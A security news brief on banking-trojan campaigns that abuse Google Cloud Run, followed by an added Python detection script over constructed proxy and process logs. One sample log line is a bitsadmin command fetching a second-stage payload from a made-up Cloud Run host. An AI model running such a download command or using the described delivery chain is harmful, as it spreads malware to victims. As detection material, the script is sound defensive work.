Cloud Security
High-volume malware campaigns abuse Google Cloud Run
BleepingComputer reports that several countries across Latin America have been subjected, since September, to high-volume attacks deploying the Astaroth, Ousaban, and Mekotio banking trojans that abuse the Google Cloud Run service.
Intrusions begin with phishing emails that use financial and tax documents, as well as local government communications, as lures and that contain links to Google Cloud Run, according to a report from Cisco Talos. Attackers then use MSI files for initial payload delivery, and later abuse the Windows BITSAdmin tool to distribute the second-stage payload. Further examination of the delivered trojans showed that more than 300 financial organizations have already been targeted by the Astaroth trojan, also known as Guildma. Aside from keylogging and clipboard monitoring, Astaroth also exfiltrates cryptocurrency wallet and banking credentials. Ousaban, which was noted to be delivered in the latter part of Astaroth attacks, enables credential phishing via fraudulent banking p […]. Meanwhile, Mekotio permits browser manipulation in addition to banking credential and personal data theft.
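The delivery chain described above has two traits a defender can look for in ordinary telemetry: a link from a mailbox that resolves to a Google Cloud Run host (or serves a Windows Installer package from one), and msiexec.exe spawning bitsadmin.exe to fetch a second stage. The following is an added example, not code from SC Media, BleepingComputer or Cisco Talos: it runs both checks over constructed proxy and process-creation log lines. The `run.app` host suffix is the real default domain for Cloud Run services; the pipe-separated log layout, hostnames, users and URLs are constructed for this example.

```python
"""Detect two traits of the Cloud Run-hosted banking trojan delivery chain
(added example; log format and all sample values are constructed)."""
import re
from urllib.parse import urlparse

# Constructed proxy log: timestamp|user|url|referrer-category
PROXY_LOG = """\
2024-02-20T09:01:12|alice|https://mail.example.com/inbox|webmail
2024-02-20T09:01:40|alice|https://invoice-8f2a1c-uc.a.run.app/factura.msi|webmail
2024-02-20T09:03:02|bob|https://docs.example.com/handbook.pdf|intranet
2024-02-20T11:15:00|carol|https://myapp-1234-rj.a.run.app/api/health|direct
"""

# Constructed process-creation log: timestamp|host|parent_image|image|command_line
PROCESS_LOG = """\
2024-02-20T09:02:05|WS-ALICE|C:\\Windows\\System32\\msiexec.exe|C:\\Windows\\System32\\bitsadmin.exe|bitsadmin /transfer upd /download /priority high https://cdn-5c1e-uc.a.run.app/s2.bin C:\\Users\\Public\\s2.bin
2024-02-20T09:05:10|WS-BOB|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\msiexec.exe|msiexec /i setup.msi /qn
2024-02-20T10:00:00|WS-CAROL|C:\\Windows\\System32\\services.exe|C:\\Windows\\System32\\svchost.exe|svchost -k netsvcs
"""

CLOUD_RUN_SUFFIX = ".run.app"      # default domain of Google Cloud Run services
INSTALLER_EXTENSIONS = (".msi",)   # Windows Installer packages used for stage one
URL_RE = re.compile(r"https?://\S+")


def is_cloud_run_host(url: str) -> bool:
    """True when the URL's host is a Cloud Run service address."""
    host = (urlparse(url).hostname or "").lower()
    return host.endswith(CLOUD_RUN_SUFFIX)


def flag_cloud_run_downloads(log: str) -> list:
    """Return (user, url) pairs for Cloud Run links reached from webmail,
    and for any Cloud Run URL that serves a Windows Installer package.
    Legitimate Cloud Run API traffic that matches neither is left alone."""
    hits = []
    for line in log.strip().splitlines():
        _ts, user, url, category = line.split("|")
        if not is_cloud_run_host(url):
            continue
        path = urlparse(url).path.lower()
        if category == "webmail" or path.endswith(INSTALLER_EXTENSIONS):
            hits.append((user, url))
    return hits


def flag_msiexec_bitsadmin(log: str) -> list:
    """Return (host, download_url, url_is_cloud_run) for every bitsadmin.exe
    process whose parent is msiexec.exe; an installer handing a download to
    BITS is the second-stage step described in the report."""
    hits = []
    for line in log.strip().splitlines():
        _ts, host, parent, image, cmdline = line.split("|")
        if not (parent.lower().endswith("\\msiexec.exe")
                and image.lower().endswith("\\bitsadmin.exe")):
            continue
        match = URL_RE.search(cmdline)
        url = match.group(0) if match else ""
        hits.append((host, url, is_cloud_run_host(url)))
    return hits


if __name__ == "__main__":
    for user, url in flag_cloud_run_downloads(PROXY_LOG):
        print(f"[proxy] {user} fetched Cloud Run content from mail: {url}")
    for host, url, cloud_run in flag_msiexec_bitsadmin(PROCESS_LOG):
        print(f"[process] {host}: msiexec -> bitsadmin fetched {url} "
              f"(Cloud Run host: {cloud_run})")
```

Both checks are deliberately narrow so they stay quiet on normal use of Cloud Run: a service health check reached directly is not flagged, while a `.msi` served from a Cloud Run host, or any Cloud Run link opened from webmail, is. Correlating the two signals by user and workstation within a short window is what turns them into a high-confidence alert for this chain.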